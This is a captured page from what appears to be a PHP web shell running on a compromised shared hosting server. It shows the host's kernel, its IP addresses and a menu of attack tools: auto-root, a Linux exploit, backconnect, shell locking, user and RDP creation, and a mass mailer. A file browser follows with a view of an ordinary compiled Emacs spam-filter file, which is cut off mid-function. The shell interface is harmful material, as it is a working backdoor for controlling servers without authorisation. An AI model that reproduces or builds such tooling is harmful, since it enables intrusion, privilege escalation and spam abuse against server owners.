Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
8.56
KB
-rw-r--r--
blessmail.el
2.5
KB
-rw-r--r--
emacsbug.elc
15
KB
-rw-r--r--
feedmail.elc
98.21
KB
-rw-r--r--
flow-fill.elc
3.15
KB
-rw-r--r--
footnote.elc
26.54
KB
-rw-r--r--
hashcash.elc
10.83
KB
-rw-r--r--
ietf-drums.elc
8.65
KB
-rw-r--r--
mail-extr.elc
32.53
KB
-rw-r--r--
mail-hist.elc
13.44
KB
-rw-r--r--
mail-parse.elc
2.3
KB
-rw-r--r--
mail-prsvr.elc
1.08
KB
-rw-r--r--
mail-utils.elc
10.13
KB
-rw-r--r--
mailabbrev.elc
14.4
KB
-rw-r--r--
mailalias.elc
14.49
KB
-rw-r--r--
mailclient.elc
4.13
KB
-rw-r--r--
mailheader.elc
5.54
KB
-rw-r--r--
metamail.elc
4.21
KB
-rw-r--r--
mspools.elc
8.74
KB
-rw-r--r--
qp.elc
4.14
KB
-rw-r--r--
reporter.elc
9
KB
-rw-r--r--
rfc2045.elc
826
B
-rw-r--r--
rfc2047.elc
24.87
KB
-rw-r--r--
rfc2231.elc
6.35
KB
-rw-r--r--
rfc2368.elc
2.32
KB
-rw-r--r--
rfc822.elc
5.45
KB
-rw-r--r--
rmail-loaddefs.el
7.79
KB
-rw-r--r--
rmail-spam-filter.elc
12.71
KB
-rw-r--r--
rmail.elc
124.13
KB
-rw-r--r--
rmailedit.elc
9.82
KB
-rw-r--r--
rmailkwd.elc
4.98
KB
-rw-r--r--
rmailmm.elc
41.24
KB
-rw-r--r--
rmailmsc.elc
1.34
KB
-rw-r--r--
rmailout.elc
17.84
KB
-rw-r--r--
rmailsort.elc
6.17
KB
-rw-r--r--
rmailsum.elc
54.29
KB
-rw-r--r--
sendmail.elc
53.92
KB
-rw-r--r--
smtpmail.elc
25.46
KB
-rw-r--r--
supercite.elc
57.29
KB
-rw-r--r--
uce.elc
7.54
KB
-rw-r--r--
undigest.elc
7.81
KB
-rw-r--r--
unrmail.elc
5.25
KB
-rw-r--r--
uudecode.elc
5.26
KB
-rw-r--r--
yenc.elc
3.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rmail-spam-filter.elc
;ELC ;;; Compiled ;;; in Emacs version 27.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\303\304\305\306\307\301%\210\310\311\305\312\313\314\307\304&\210\310\315\316\317\313\320\307\304&\210\310\321\305\322\313\314\307\304&\210\310\323\305\324\313\314\307\304&\210\310\325\305\326\313\314\307\304&\210\310\327\330\331\313\332\307\304&\210\310\333\334\335\313\336\307\304&\210\310\337\305\340\313\314\307\304&\210\310\341\305\342\313\343\307\304&\210\310\344\305\345\313\346\307\304&\207" [require rmail rmailsum custom-declare-group rmail-spam-filter nil "Spam filter for Rmail, the Emacs mail reader." :group custom-declare-variable rmail-use-spam-filter "Non-nil to activate the Rmail spam filter.\nSet `rsf-definitions-alist' to define what you consider spam emails." :type boolean rsf-file "~/XRMAIL-SPAM" "Name of Rmail file for optionally saving some of the spam.\nYou can either just delete spam, or save it in this file for\nlater review. Which action to take for each spam definition is\nspecified by the \"action\" element of the definition." string rsf-no-blind-cc "Non-nil means mail with no explicit To: or Cc: is spam." rsf-ignore-case "Non-nil means to ignore case in `rsf-definitions-alist'." rsf-beep "Non-nil means to beep if spam is found." rsf-sleep-after-message 2.0 "Seconds to wait after displaying a message that spam was found." number rsf-min-region-to-spam-list 7 "Minimum size of region that you can add to the spam list.\nThe aim is to avoid adding too short a region, which could result\nin false positive identification of a valid message as spam." integer rsf-autosave-newly-added-definitions "Non-nil to auto-save new spam entries.\nAny time you add an entry via the \"Spam\" menu, immediately saves\nthe custom file." rsf-white-list "List of regexps to identify valid senders.\nIf any element matches the \"From\" header, the message is\nflagged as a valid, non-spam message. E.g., if your domain is\n\"emacs.com\" then including \"emacs\\\\.com\" in this list would\nflag all mail (purporting to be) from your colleagues as valid." (repeat string) rsf-definitions-alist "A list of rules (definitions) matching spam messages.\nEach rule is an alist, with elements of the form (FIELD . REGEXP).\nThe recognized FIELDS are: from, to, subject, content-type,\nx-spam-status, and contents. The \"contents\" element refers to\nthe entire text of the message; all the other elements refer to\nmessage headers of the same name.\n\nUsing an empty-string for REGEXP is the same as omitting that\nelement altogether.\n\nEach rule should contain one \"action\" element, saying what to do\nif the rule is matched. This has the form (action . CHOICE), where\nCHOICE may be either `output-and-delete' (save to `rsf-file', then delete),\nor `delete-spam' (just delete).\n\nA rule matches only if all the specified elements match." (repeat (list :format "%v" (cons :format "%v" :value (from . #1="") (const :format #1# from) (string :tag "From" #1#)) (cons :format "%v" :value (to . #1#) (const :format #1# to) (string :tag "To" #1#)) (cons :format "%v" :value (subject . #1#) (const :format #1# subject) (string :tag "Subject" #1#)) (cons :format "%v" :value (content-type . #1#) (const :format #1# content-type) (string :tag "Content-Type" #1#)) (cons :format "%v" :value (contents . #1#) (const :format #1# contents) (string :tag "Contents" #1#)) (cons :format "%v" :value (x-spam-status . #1#) (const :format #1# x-spam-status) (string :tag "X-Spam-Status" #1#)) (cons :format "%v" :value (action . output-and-delete) (const :format #1# action) (choice :tag "Action selection" (const :tag "Output and delete" output-and-delete) (const :tag "Delete" delete-spam)))))] 8) #@50 Non-nil when `rmail-spam-filter' scans messages. (defvar rsf-scanning-messages-now nil (#$ . 4064)) #@594 Check if a message appears to be spam. FIELD-SYMBOL is one of the possible keys of a `rsf-definitions-alist' rule; e.g. from, to. MESSAGE-DATA is a string giving the value of FIELD-SYMBOL in the current message. DEFINITION is the element of `rsf-definitions-alist' currently being checked. RESULT is a cons of the form (MAYBE-SPAM . IS-SPAM). If the car is nil, or if the entry for FIELD-SYMBOL in this DEFINITION is absent or the empty string, this function does nothing. Otherwise, if MESSAGE-DATA is non-nil and the entry matches it, the cdr is set to t. Else, the car is set to nil. (defalias 'rsf-check-field #[(field-symbol message-data definition result) "\305 \"A@\205&